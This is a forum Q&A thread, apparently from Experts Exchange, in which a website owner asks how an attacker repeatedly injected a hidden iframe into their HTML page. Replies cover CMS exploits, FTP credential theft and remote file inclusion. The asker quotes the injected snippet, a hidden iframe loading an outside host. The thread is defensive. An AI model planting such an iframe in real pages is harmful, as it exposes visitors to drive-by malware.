Solved

How can I prevent hackers from putting code into my website?

Posted on 2010-11-09
8
1,234 Views
Last Modified: 2012-05-10
I have had twice now, someone place a string of code on one of my websites.  They stick it after the </body> tag inside a <div> as you see below.  This is a different url in the code than the first time they did this, but the code is the same.  (i.e. It's the same kind of redirect inside a <div> tag).  The one I found this morning looks like:

</body>
 <div style="visibility:hidden"><iframe src="http://joomla.philae.net/blog.php" width=10 height=10></iframe></div>
</html>

The webpage they install it on is hcgdietdropsreview.com/index.html.  

I need to know how to prevent this from happening?  
How do they install it?  

The server host says that no one is accessing my account, but not being a programmer I don't know where to turn.  I'm good with html but only know enough .php to do very basic tasks.

Also, I don't know if this is relevant or not but prior to asking this question, I did have some facebook code on this index page, hidden behind a <!-- --> tag.  I had placed it there for when I officially launch the website.  I didn't want it visible until after I launch, although the domain and website are live at the moment.  It was one of those facebook "like" buttons.  Since it too is an <iframe> I decided to remove it, in case it had anything to do with the malicious code someone is putting on my page.

Please let me know if you need any other information or details and thanks in advance for your help.
0
Comment
Question by:wgrogers
[X]
Welcome to Experts Exchange

Add your voice to the tech community where 5M+ people just like you are talking about what matters.

  • Help others & share knowledge
  • Earn cash & points
  • Learn & ask questions
  • 4
  • 3
8 Comments
 
LVL 2

Expert Comment

by:rstaats
ID: 34096015
May be an exploit in the CMS you're using?  I've had this issue with wordpress a couple times where it was vulnerable to a SQL injection attack.  Wordpress is really good about turning around and fixing the issue promptly, but that's an issue you'd need to take up with the dudes coding the CMS.
0
 
LVL 6

Expert Comment

by:stilliard
ID: 34096643
Theres also been an increase on ftp virus's which steal your ftp account details, then edit files such as index.php/html and .htaccess and add code such as that or links to porn sites, and with htaccess hacks they can redirect traffic from search engines over to other sites. You can prevent these by locking your ftp access to your ip address, or only open it when needed.
0
 

Author Comment

by:wgrogers
ID: 34097360
rstaats:  Not using CMS - this just straight forward html, nothing else.  I realize this is a wp theme but was a template I got and am using as html.  I do not have a wp account.

stilliard:  .htacess has not been accessed.  Only the string of code there on the end of the html was updated via ftp, somehow.  I checked with the host and no one has accessed my ftp today except by my own IP address.  

I do not get how this kind of code gets on the page if they are not going by ftp?
Is there any way to prevent this code from being installed on one's website?
0
When ransomware hits your clients, what do you do?

MSPs: Endpoint security isn’t enough to prevent ransomware.
As the impact and severity of crypto ransomware attacks has grown, Webroot fought back, not just by building a next-gen endpoint solution capable of preventing ransomware attacks but also by being a thought leader.

 
LVL 6

Expert Comment

by:stilliard
ID: 34098152
Ok, try running a security scanner over your site, it may find something.
I use acunetix to scan my sites, there's a free version you can download from there site.
http://www.acunetix.com/
0
 

Author Comment

by:wgrogers
ID: 34098507
Stilliard

Okay, I don't really have that much I need to scan.  I can view all the site pages in about four minutes.  As I mentioned, I'm in process of developing the site and only have a very few pages online.  Your acunetix site is nice, but way overkill for what I've got.

As for finding the malicious code, I found and removed it about an hour after they had uploaded it to the website.  Nothing else has been uploaded to my site.

Truly, all I'm trying to determine is:  1) How does a hacker add this code, (see ex above in description), without accessing the ftp or host account and 2) What steps can I take to prevent such a hack in the future?

0
 
LVL 6

Accepted Solution

by:
stilliard earned 500 total points
ID: 34099952
Although it would seem overkill, its free and worth it just to see if it finds anything, the free version will mainly scan for XXS attacts but also finds some other things which may be more usefull for you here.

Also i've found some other links that may help you find out how this happened and how to prevent it or at least detect it fast in future.
http://www.experts-exchange.com/Networking/ISPs_Hosting/Web_Hosting/Q_24521530.html
http://www.diovo.com/2009/03/hidden-iframe-injection-attacks/
http://blog.unmaskparasites.com/2009/10/28/evolution-of-hidden-iframes/
0
 

Assisted Solution

by:wgrogers
wgrogers earned 0 total points
ID: 34125560
I think what I was really looking for is called a "Remote File Inclusion (RFI) vulnerability" and I found some useful information on the website: http://25yearsofprogramming.com/blog/20070705.htm

So, stilliard, because you did respond to my post, I will award the points to you.
0
 

Author Closing Comment

by:wgrogers
ID: 34153384
See my last post if RFI vulnerability is an issue for your case.
0

Featured Post

Free Tool: ZipGrep

ZipGrep is a utility that can list and search zip (.war, .ear, .jar, etc) archives for text patterns, without the need to extract the archive's contents.

One of a set of tools we're offering as a way to say thank you for being a part of the community.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

There is a lot to be said for protecting yourself and your accounts with 2 factor authentication.  I found to my own chagrin, that there is a big downside as well.
This article provides a convenient collection of links to Microsoft provided Security Patches for operating systems that have reached their End of Life support cycle. Included operating systems covered by this article are Windows XP,  Windows Server…
Sending a Secure fax is easy with eFax Corporate (http://www.enterprise.efax.com). First, just open a new email message. In the To field, type your recipient's fax number @efaxsend.com. You can even send a secure international fax — just include t…
Sometimes it takes a new vantage point, apart from our everyday security practices, to truly see our Active Directory (AD) vulnerabilities. We get used to implementing the same techniques and checking the same areas for a breach. This pattern can re…

622 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question